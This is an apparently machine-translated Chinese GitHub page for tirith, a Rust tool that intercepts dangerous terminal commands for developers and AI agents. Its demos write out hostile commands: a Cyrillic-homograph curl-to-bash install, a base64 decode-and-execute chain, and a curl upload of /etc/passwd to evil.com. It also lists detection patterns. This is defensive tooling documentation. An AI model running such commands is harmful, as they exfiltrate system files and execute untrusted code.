sheeki03/tirith

Terminal security for developers and AI agents. Intercepts homograph URLs, pipe-to-shell, ANSI injection, obfuscated payloads, data exfiltration, and malicious AI skills/configs before they execute.

clidevtoolshomograph-attackrustsecurityshellsupply-chain-securityterminalunicodeurl-security

GAI 中文摘要

Tirith 是一个专为开发者和 AI 智能体设计的终端安全防护工具，旨在通过在命令执行前进行拦截和审查，弥补现有终端对恶意指令防护能力的缺失。它能够有效检测并阻断针对终端环境的多种攻击向量，确保用户及自动化程序在执行操作时的安全性。

该工具具备同形异义词 URL 拦截功能，可识别并阻止伪装成合法域名的钓鱼连接。系统能实时监测并封禁管道传输至 Shell 的恶意脚本，防止隐蔽的指令执行。它提供 ANSI 转义序列过滤，防止终端显示攻击及虚假输出干扰。该软件内置针对混淆负载、数据泄露行为以及恶意 AI 技能配置的扫描机制，实现多维度的威胁检测。

Tirith 适用于注重生产环境安全的开发者及部署 AI 自动化 Agent 的技术团队，特别适合需要防护脚本执行、远程操作及供应链攻击的开发与运维场景。

⭐

2.4k

Stars

🔱

Forks

👁

Watchers

📋

Issues

RustAGPL-3.0创建于 2026/2/2更新于今天

在 GitHub 上查看访问主页

README

由 Gemini 翻译整理

tirith

你的浏览器能识别这类威胁，但你的终端不能。

网站 | 文档 | SKILL.md | 更新日志

你能看出区别吗？

  curl -sSL https://install.example-cli.dev | bash     # 安全
  curl -sSL https://іnstall.example-clі.dev | bash     # 被篡改

你看不出来，你的终端也一样。这两个 і 字符其实是西里尔字母 (U+0456)，而非拉丁字母 i。第二个 URL 指向的是攻击者的服务器，而脚本会在你察觉之前就已经执行。

浏览器多年前就解决了这个问题。然而，终端依然会毫无防备地渲染 Unicode、ANSI 转义序列和不可见字符。AI Agent 在执行 Shell 命令和安装软件包时，往往不会检查其内部逻辑。

Tirith 守卫着终端的入口。 它会在命令执行前对其进行拦截、扫描。无论是粘贴的内容还是文件，Tirith 都会检查是否存在同形异义 URL、混淆的 Payload、凭据泄露、恶意的 AI Skill/配置，以及来自签名威胁情报数据库的已知不良软件包、域名或 IP。

brew install sheeki03/tap/tirith

然后在你的 Shell 配置文件中激活：

# zsh
eval "$(tirith init --shell zsh)"

# bash
eval "$(tirith init --shell bash)"

# fish
tirith init --shell fish | source

[!TIP] eval "$(tirith init)" 会自动检测你当前使用的 Shell（它会检查父进程，并在必要时回退到 $SHELL）。只有当你需要覆盖自动检测结果时，才需要显式使用 --shell 标志。

就是这样。你运行的每一条命令现在都处于保护之下。对于合法的输入，系统零阻碍，且性能损耗小于毫秒级。你甚至会忘记它的存在，直到它在关键时刻保护了你。

也可以通过 npm, cargo, mise, apt/dnf 以及更多方式安装。

效果演示

同形异义攻击（Homograph attack）—— 执行前拦截：

$ curl -sSL https://іnstall.example-clі.dev | bash

tirith: BLOCKED
  [CRITICAL] non_ascii_hostname — 主机名中包含西里尔字母 і (U+0456)
    这是一次同形异义攻击。该 URL 在视觉上模仿了合法域名，
    但实际上指向了完全不同的服务器。
  绕过：在该命令前加上 TIRITH=0（仅对该条命令有效）

该命令绝不会被执行。

使用合规 URL 进行 Pipe-to-shell —— 仅警告，不拦截：

$ curl -fsSL https://get.docker.com | sh

tirith: WARNING
  [MEDIUM] pipe_to_interpreter — 管道传输下载内容到解释器
    建议先下载并进行审查。

警告信息会输出到 stderr，命令仍会继续运行。

Base64 解码执行链 —— 拦截：

$ echo payload | base64 -d | bash

tirith: BLOCKED
  [HIGH] base64_decode_execute — Base64 解码内容并通过管道传输给解释器
  [HIGH] pipe_to_interpreter — 管道至解释器：base64 | bash

同样可以捕捉通过 sudo/env 包装器以及 PowerShell -EncodedCommand 进行的解码链。

凭据泄露 —— 拦截：

$ curl -d @/etc/passwd https://evil.com/collect

tirith: BLOCKED
  [HIGH] data_exfiltration — 通过 curl 上传进行数据泄露
    curl 命令正在将敏感数据上传到远程服务器

涵盖了所有 curl/wget 的上传标志、环境变量（如 $AWS_SECRET_ACCESS_KEY）以及命令替换。

恶意 Skill 文件 —— 扫描时捕捉：

$ tirith scan evil_skill.py

tirith scan: evil_skill.py — 发现 3 个问题
  [MEDIUM] dynamic_code_execution — 在 b64decode() 附近存在 exec() 调用
  [MEDIUM] obfuscated_payload — 发现长 Base64 字符串解码并执行
  [MEDIUM] suspicious_code_exfiltration — HTTP 调用将敏感数据作为参数传递

扫描 JS/Python 文件中的混淆 Payload、动态代码执行和秘密泄露模式。

正常命令 —— 完全无感：

$ git status
$ ls -la
$ docker compose up -d

什么都不会发生。零输出。你会忘记 tirith 正在运行。

拦截范围

涵盖 15 个类别，共 80 多条检测规则。

类别	拦截内容
同形异义攻击	主机名中的西里尔/希腊字母混淆、Punycode 域名、混合脚本标签、相似 TLD、易混淆域名、文本级混淆检测（数学字母数字、同词不同脚本混合）
终端注入	ANSI 转义序列、双向重写（bidi overrides）、零宽字符、Unicode 标签、不可见数学运算符、变体选择器、韩文填充符
隐写防御	不可见空格编码（12 种 Unicode 空格变体）、蒙古文元音分隔符、韩文填充符、数学字母数字替换——针对 st3gg 风格文本隐写的防御
Pipe-to-shell	`curl \| bash`, `wget \| sh`, `httpie \| sh`, `xh \| sh`, `python \| sh` 等